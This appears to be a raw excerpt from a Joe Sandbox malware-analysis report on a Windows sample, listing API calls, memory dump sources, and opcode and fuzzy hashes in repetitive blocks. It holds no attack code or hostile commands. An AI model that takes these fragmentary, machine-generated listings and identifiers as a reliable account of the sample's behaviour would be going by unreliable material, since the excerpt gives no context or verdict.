                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsDevice$Release
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1035833867-0
                                                                                                                  • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                  • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                                                                  • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                  • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                                                                  APIs
                                                                                                                  • __getptd.LIBCMT ref: 0041708E
                                                                                                                    • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                    • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                  • __amsg_exit.LIBCMT ref: 004170AE
                                                                                                                  • __lock.LIBCMT ref: 004170BE
                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                                                                  • _free.LIBCMT ref: 004170EE
                                                                                                                  • InterlockedIncrement.KERNEL32(02D02D00), ref: 00417106
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3470314060-0
                                                                                                                  • Opcode ID: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                                                                                  • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                                                                  • Opcode Fuzzy Hash: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                                                                                  • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                                                                  APIs
                                                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                                                  • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                                                    • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3495660284-0
                                                                                                                  • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                  • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                                                                  • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                  • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                                                                  APIs
                                                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Virtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4278518827-0
                                                                                                                  • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                  • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                                                                  • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                  • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                                                                  APIs
                                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                    • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                    • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                  • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                    • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                  • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                  • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                  • __freefls@4.LIBCMT ref: 00415209
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 442100245-0
                                                                                                                  • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                  • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                                                                  • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                  • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                  • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                                                  • _wcslen.LIBCMT ref: 0045F94A
                                                                                                                  • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                  • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 621800784-4108050209
                                                                                                                  • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                                  • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                                                                  • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                                  • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                  • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                  • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                                                  • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                                                                  • String ID: \VH
                                                                                                                  • API String ID: 3884216118-234962358
                                                                                                                  • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                  • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                                                                  • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                  • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                                                                  APIs
                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                                                                  • IsMenu.USER32(?), ref: 0044854D
                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                                                                  • DrawMenuBar.USER32 ref: 004485AF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Item$DrawInfoInsert
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 3076010158-4108050209
                                                                                                                  • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                  • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                                                                  • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                  • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                                                                  • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$_memmove_wcslen
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 1589278365-1403004172
                                                                                                                  • Opcode ID: 58aad4fa0250eb7f7770942c3fbf3b6afd47c1e1aeb3dbfab6ae46a7176094c5
                                                                                                                  • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                                                                  • Opcode Fuzzy Hash: 58aad4fa0250eb7f7770942c3fbf3b6afd47c1e1aeb3dbfab6ae46a7176094c5
                                                                                                                  • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Handle
                                                                                                                  • String ID: nul
                                                                                                                  • API String ID: 2519475695-2873401336
                                                                                                                  • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                  • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                                                                  • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                  • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                                                                  APIs
                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Handle
                                                                                                                  • String ID: nul
                                                                                                                  • API String ID: 2519475695-2873401336
                                                                                                                  • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                                  • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                                                                  • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                                  • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                                                                  APIs
                                                                                                                  • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                  • _wcsncpy.LIBCMT ref: 00401C41
                                                                                                                  • _wcscpy.LIBCMT ref: 00401C5D
                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                                                                  • String ID: Line:
                                                                                                                  • API String ID: 1874344091-1585850449
                                                                                                                  • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                  • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                                                                  • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                  • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: SysAnimate32
                                                                                                                  • API String ID: 0-1011021900
                                                                                                                  • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                  • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                                                                  • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                  • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                    • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                    • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                    • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                    • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                  • GetFocus.USER32 ref: 0046157B
                                                                                                                    • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                                                    • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                                                  • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                                                  • __swprintf.LIBCMT ref: 00461608
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
